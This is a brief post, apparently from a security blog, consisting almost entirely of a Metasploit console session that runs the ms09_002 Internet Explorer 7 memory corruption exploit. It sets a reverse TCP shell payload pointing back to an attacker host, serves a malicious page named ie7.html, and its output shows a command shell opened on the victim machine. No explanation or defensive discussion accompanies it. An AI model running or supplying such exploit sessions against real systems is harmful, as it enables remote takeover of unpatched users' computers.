MS09002 Memory Corruption Exploit
Details to follow. :-)
msf > use exploit/windows/browser/ms09_002 msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms09_002) > set LPORT 1701 LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15 LHOST => 10.10.10.15 msf exploit(ms09_002) > set URIPATH ie7.html URIPATH => ie7.html msf exploit(ms09_002) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms09_002) > exploit [] Exploit running as background job. msf exploit(ms09_002) > [] Handler binding to LHOST 10.10.10.15 [] Handler binding to LHOST 0.0.0.0 [] Started reverse handler [] Using URL: http://0.0.0.0:80/ie7.html [] Local IP: http://10.10.10.15:80/ie7.html [] Server started. [] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865… [*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)